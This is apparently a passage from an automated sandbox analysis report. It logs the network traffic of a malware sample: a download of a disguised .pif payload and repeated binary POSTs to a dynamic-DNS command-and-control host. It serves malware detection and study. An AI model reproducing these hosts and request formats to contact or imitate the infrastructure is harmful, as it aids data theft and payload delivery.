                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: global trafficHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 145Connection: close
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\screens.pifCode function: 5_2_00404ED4 recv,5_2_00404ED4
                Source: global trafficHTTP traffic detected: GET /flow/sfdkavhbsfvhahlbfabreaireuafrgfyarfdkabrbfvakysrgfea/zdhkbgualsbifbAFRAWYEGFYAUGEYGywefafaer/nezfdio.pif HTTP/1.1Host: www.sodiumlaurethsulfatedesyroyer.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: www.sodiumlaurethsulfatedesyroyer.com
                Source: global trafficDNS traffic detected: DNS query: freighteighttwocam.ddns.net
                Source: unknownHTTP traffic detected: POST /mdifygidj/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: freighteighttwocam.ddns.netAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 5EE1FC9EContent-Length: 172Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:47 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:55 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:56 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:58 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:20:59 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:01 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:03 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:04 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:05 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:06 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:07 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:08 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:09 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:10 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:11 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:12 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:13 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:14 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:16 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:17 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:19 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:20 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:21 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:22 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:23 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:24 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:25 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:26 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:27 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:28 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.10.3Date: Thu, 03 Oct 2024 07:21:29 GMTContent-Type: text/htmlConnection: closeX-Powered-By: PHP/5.3.3Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
